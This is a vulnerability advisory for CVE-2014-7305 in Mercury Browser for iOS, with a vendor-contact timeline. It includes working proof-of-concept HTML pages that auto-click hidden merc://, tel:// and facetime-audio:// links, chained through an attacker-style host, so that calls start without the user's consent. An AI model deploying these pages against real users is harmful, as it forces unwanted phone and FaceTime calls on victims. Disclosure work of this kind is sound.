| Title | Issue with Facetime and Facetime-Audio URL Schemes on Mercury Browser |
|---|---|
| Affected Vendor: | RichText Web Site |
| Affected Software: | Mercury Browser and Mercury Browser Pro |
| Affected Version: | All known versions on iOS |
| Issue Type: | Lack of user confirmation leading to Telephone and Facetime Audio calls being arbitrarily initialized by an attacker. |
| Release Date: | October 13, 2014 |
| Discovered by: | Matias P. Brutti - @S9Labs |
| CVE Identifier: | CVE-2014-7305 |
| Issue Status: | No response provided as of 10/13/2014. Still vulnerable. |
Using the same technique deployed by Andrei Neculaesei ( link: http://algorithm.dk/posts/rtfm-0day-in-ios-apps-g-gmail-fb-messenger-etc) to bypass some iOS applications including G+, Facebook, Hangouts, among others to launch phone calls automatically without permission. By looking for a way to also exploit this directly on Messages which according to the author of the other vulnerabilities was not possible, we found that it was possible to attack people by jumping from the default Safary browser WebView using browsers url handlers.
We found that Mercury Browser had a known merc:// URL handler which might helps us make the jump from Messages to a vulnerable browser for exploitation. Mercury Browser and Mercury Browser Pro are vulnerable to two attacks including making arbitrary telephone calls and arbitrary FaceTime audio calls. The only one that was not automatically working was initializing a FaceTime call, which is correctly prompting users.
Both browsers are vulnerable because the developer while writing the code did not correctly handle webView:shouldStartLoadWithRequest:navigationType: to prompt users before initializing the calls.
For example if using Messages, An attcker could easily send a link friendly link to a malicious or compromised website (i.e http://evilrovot.com/merc.html). Knowing that Safari will not open tel:// directly and it will pop-up a message, a two step approach is needed using the merc:// URL handler to open a new mercury window on a new page which will trigger the vulnerability on http://evilrovot.com/tel.html.
[ APP RECEIVING LINK ] --> [ SAFARI ] --> [ MERCURY BROWSER ] --> [ TEL ]
Code for this files is as follow:
merc.html
<html>
<body>
<a id="callme" href="merc://evilrovot.com/tel.html" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>tel.html
<html>
<body>
<a id="callme" href="tel://+0000" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>ft_audio.html
<html>
<body>
<a id="callme" href="facetime-audio://+0000" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>The ideal behavior should be that it triggers a pop-up asking the user wether he/she wants to start a Tel or FaceTime-Audio conversation with the number in question.
9/22 — Tried to Contact Vendor through their Contact Us page on https://mercury-browser.com/contact.html by failed
9/22 — Try to contact through Twitter but no response provided
9/28 — Sent again using Contact Us page on main Company page - http://www.ilegendsoft.com/.
10/13 — No response provided to date.
10/13 — Vulnerability made public.
https://medium.com/section-9-lab/paid-apps-do-come-with-a-price-bc0533a94ff9